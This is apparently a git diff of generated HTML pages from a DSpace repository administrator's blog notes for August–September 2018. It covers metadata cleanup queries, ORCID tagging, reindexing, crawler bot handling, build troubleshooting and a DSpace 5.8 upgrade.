<li>I looked in the database to see the breakdown of date formats used in <code>dc.date.issued</code>, ie YYYY, YYYY-MM, or YYYY-MM-DD:</li>
</ul>
<pre><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}$&#39;;
count
-------
53292
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}$&#39;;
count
-------
3818
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}-[0-9]{2}$&#39;;
count
-------
17357
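dspace=# -- not from the original notes: a sketch of the same breakdown in a single query
dspace=# select case when text_value ~ '^[0-9]{4}$' then 'YYYY' when text_value ~ '^[0-9]{4}-[0-9]{2}$' then 'YYYY-MM' when text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$' then 'YYYY-MM-DD' else 'other' end as format, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=15 group by format;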
@ -569,15 +569,15 @@ dspace=# select count(text_value) from metadatavalue where resource_type_id=2 an
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
I ran all system updates on DSpace Test and rebooted it
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ I ran all system updates on DSpace Test and rebooted it
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ I ran all system updates on DSpace Test and rebooted it
<p class="blog-post-meta">
<time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -136,7 +136,7 @@ I ran all system updates on DSpace Test and rebooted it
<ul>
<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
</ul>
<pre><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -161,7 +161,7 @@ I ran all system updates on DSpace Test and rebooted it
<ul>
<li>DSpace Test crashed again and the only error I see is this in <code>dmesg</code>:</li>
</ul>
<pre><code>[Thu Aug 2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
<pre tabindex="0"><code>[Thu Aug 2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
[Thu Aug 2 00:00:12 2018] Killed process 1407 (java) total-vm:18876328kB, anon-rss:6323836kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>I am still assuming that this is the Tomcat process that is dying, so maybe actually we need to reduce its memory instead of increasing it?</li>
@ -179,13 +179,13 @@ I ran all system updates on DSpace Test and rebooted it
<li>I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors</li>
<li>Finally I did a test run with the <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2018-08-16">2018-08-16</h2>
<ul>
<li>Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
</code></pre><ul>
<li>Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month</li>
<li>I might need to overhaul the <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration</li>
@ -195,21 +195,21 @@ $ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspac
<li>I will have to update my script to extract the ORCID identifier and search for that</li>
<li>Re-create my local DSpace database using the latest PostgreSQL 9.6 Docker image and re-import the latest CGSpace dump:</li>
</ul>
<pre><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
<pre tabindex="0"><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><h2 id="2018-08-19">2018-08-19</h2>
<ul>
<li>Keep working on the CIAT ORCID identifiers from Elizabeth</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&quot;) I will just tag them with ORCID identifiers too</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&rdquo;) I will just tag them with ORCID identifiers too</li>
<li>This is less obvious and more error prone with names like &ldquo;Peters&rdquo; where there are many more authors</li>
<li>I see some errors in the variations of names as well, for example:</li>
</ul>
<pre><code>Verchot, Louis
<pre tabindex="0"><code>Verchot, Louis
Verchot, L
Verchot, L. V.
Verchot, L.V
@ -220,44 +220,44 @@ Verchot, Louis V.
<li>I&rsquo;ll just tag them all with Louis Verchot&rsquo;s ORCID identifier&hellip;</li>
<li>In the end, I&rsquo;ll run the following CSV with my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Campbell, Bruce&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, Bruce M.&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, B.M&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Peters, Michael&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.K.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Tamene, Lulseged&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Desta, Lulseged Tamene&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Läderach, Peter&quot;,Peter Läderach: 0000-0001-8708-6318
&quot;Lundy, Mark&quot;,Mark Lundy: 0000-0002-5241-3777
&quot;Schultze-Kraft, Rainer&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Schultze-Kraft, R.&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Verchot, Louis&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L. V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, LV&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, Louis V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Mukankusi, Clare&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Mukankusi, Clare M.&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Wyckhuys, Kris&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A. G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A.G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Chirinda, Ngonidzashe&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Chirinda, Ngoni&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Ngonidzashe, Chirinda&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Campbell, Bruce&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, Bruce M.&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, B.M&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Peters, Michael&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.K.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Tamene, Lulseged&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Desta, Lulseged Tamene&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Läderach, Peter&#34;,Peter Läderach: 0000-0001-8708-6318
&#34;Lundy, Mark&#34;,Mark Lundy: 0000-0002-5241-3777
&#34;Schultze-Kraft, Rainer&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&#34;Schultze-Kraft, R.&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&#34;Verchot, Louis&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L. V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, L.V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, LV&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Verchot, Louis V.&#34;,Louis Verchot: 0000-0001-8309-6754
&#34;Mukankusi, Clare&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Mukankusi, Clare M.&#34;,Clare Mukankusi: 0000-0001-7837-4545
&#34;Wyckhuys, Kris&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A. G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Wyckhuys, Kris A.G.&#34;,Kris Wyckhuys: 0000-0003-0922-488X
&#34;Chirinda, Ngonidzashe&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Chirinda, Ngoni&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Ngonidzashe, Chirinda&#34;,Ngonidzashe Chirinda: 0000-0002-4213-6294
</code></pre><ul>
<li>The invocation would be:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers</li>
<li>Looking at the list of author affiliations from Peter one last time</li>
<li>I notice that I should add the Unicode character 0x00b4 (´) to my list of invalid characters to look for in Open Refine, so the latest version of the GREL expression is:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -268,12 +268,12 @@ Verchot, Louis V.
<li>This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n</li>
<li>I will run the following on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
<li>Then force an update of the Discovery index on DSpace Test:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 72m12.570s
@ -282,7 +282,7 @@ sys 2m2.461s
</code></pre><ul>
<li>And then on CGSpace:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 79m44.392s
@ -292,15 +292,15 @@ sys 2m20.248s
<li>Run system updates on DSpace Test and reboot the server</li>
<li>In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;19/Aug/2018&#39; | grep -c 5.9.6.51
1553
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-08-19
1724
</code></pre><ul>
<li>I don&rsquo;t even know how it&rsquo;s possible for the bot to use MORE sessions than total requests&hellip;</li>
<li>The user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
</code></pre><ul>
<li>So I&rsquo;m thinking we should add &ldquo;crawl&rdquo; to the Tomcat Crawler Session Manager valve, as we already have &ldquo;bot&rdquo; that catches Googlebot, Bingbot, etc.</li>
</ul>
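<ul>
<li>For reference, that valve looks something like this in Tomcat&rsquo;s <code>server.xml</code> (a sketch using the default crawler agents plus <code>crawl</code>; the exact attributes on our servers may differ):</li>
</ul>
<pre><code>&lt;Valve className=&quot;org.apache.catalina.valves.CrawlerSessionManagerValve&quot;
       crawlerUserAgents=&quot;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*crawl.*&quot; /&gt;
</code></pre>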
@ -325,7 +325,7 @@ sys 2m20.248s
<ul>
<li>Something must have happened, as the <code>mvn package</code> <em>always</em> takes about two hours now, stopping for a very long time near the end at this step:</li>
</ul>
<pre><code>[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
<pre tabindex="0"><code>[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
</code></pre><ul>
<li>It&rsquo;s the same on DSpace Test, my local laptop, and CGSpace&hellip;</li>
<li>It wasn&rsquo;t this way before when I was constantly building the previous 5.8 branch with Atmire patches&hellip;</li>
@ -335,7 +335,7 @@ sys 2m20.248s
<li>That one only took 13 minutes! So there is definitely something wrong with our 5.8 branch, now I should try vanilla DSpace 5.8</li>
<li>I notice that the step this pauses at is:</li>
</ul>
<pre><code>[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
<pre tabindex="0"><code>[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
</code></pre><ul>
<li>And I notice that Atmire changed something in the XMLUI module&rsquo;s <code>pom.xml</code> as part of the DSpace 5.8 changes, specifically to remove the exclude for <code>node_modules</code> in the <code>maven-war-plugin</code> step</li>
<li>This exclude is <em>present</em> in vanilla DSpace, and if I add it back the build time goes from 1 hour 23 minutes to 12 minutes!</li>
@ -352,23 +352,23 @@ sys 2m20.248s
<li>It appears that the web UI&rsquo;s upload interface <em>requires</em> you to specify the collection, whereas the CLI interface allows you to omit the collection command line flag and defer to the <code>collections</code> file inside each item in the bundle</li>
<li>I imported the CTA items on CGSpace for Sisay:</li>
</ul>
<pre><code>$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
<pre tabindex="0"><code>$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
</code></pre><h2 id="2018-08-26">2018-08-26</h2>
<ul>
<li>Doing the DSpace 5.8 upgrade on CGSpace (linode18)</li>
<li>I already finished the Maven build, now I&rsquo;ll take a backup of the PostgreSQL database and do a database cleanup just in case:</li>
</ul>
<pre><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
$ dspace cleanup -v
</code></pre><ul>
<li>Now I can stop Tomcat and do the install:</li>
</ul>
<pre><code>$ cd dspace/target/dspace-installer
<pre tabindex="0"><code>$ cd dspace/target/dspace-installer
$ ant update clean_backups update_geolite
</code></pre><ul>
<li>After the successful Ant update I can run the database migrations:</li>
</ul>
<pre><code>$ psql dspace dspace
<pre tabindex="0"><code>$ psql dspace dspace
dspace=&gt; \i /tmp/Atmire-DSpace-5.8-Schema-Migration.sql
DELETE 0
@ -380,7 +380,7 @@ $ dspace database migrate ignored
</code></pre><ul>
<li>Then I&rsquo;ll run all system updates and reboot the server:</li>
</ul>
<pre><code>$ sudo su -
<pre tabindex="0"><code>$ sudo su -
# apt update &amp;&amp; apt full-upgrade
# apt clean &amp;&amp; apt autoclean &amp;&amp; apt autoremove
# reboot
@ -391,11 +391,11 @@ $ dspace database migrate ignored
<li>I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject <code>GENDER</code> or <code>GENDER POVERTY AND INSTITUTIONS</code>, and CRP <code>Water, Land and Ecosystems</code></li>
<li>Then I extracted the Handle links from the report so I could export each item&rsquo;s metadata as CSV</li>
</ul>
<pre><code>$ grep -o -E &quot;[0-9]{5}/[0-9]{0,5}&quot; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ grep -o -E &#34;[0-9]{5}/[0-9]{0,5}&#34; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>Then on the DSpace server I exported the metadata for each item one by one:</li>
</ul>
<pre><code>$ while read -r line; do dspace metadata-export -f &quot;/tmp/${line/\//-}.csv&quot; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &#34;/tmp/${line/\//-}.csv&#34; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
</code></pre><ul>
<li>But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them</li>
<li>I&rsquo;m not sure how to proceed without writing some script to parse and join the CSVs, and I don&rsquo;t think it&rsquo;s worth my time</li>
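<li>For future reference, pandas would handle the differing columns (a sketch, not something I actually ran; it unions the columns and leaves missing cells empty):
<pre><code>import glob

import pandas as pd

# read each per-item CSV exported above and stack them, unioning the columns
frames = [pd.read_csv(f) for f in glob.glob('/tmp/10568-*.csv')]
combined = pd.concat(frames, ignore_index=True, sort=False)
combined.to_csv('/tmp/iwmi-gender-combined.csv', index=False)
</code></pre>
</li>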
@ -442,15 +442,15 @@ $ dspace database migrate ignored
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and ru
Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -60,12 +60,12 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -111,7 +111,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<p class="blog-post-meta">
<time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -123,8 +123,8 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
</ul>
<pre><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
<pre tabindex="0"><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
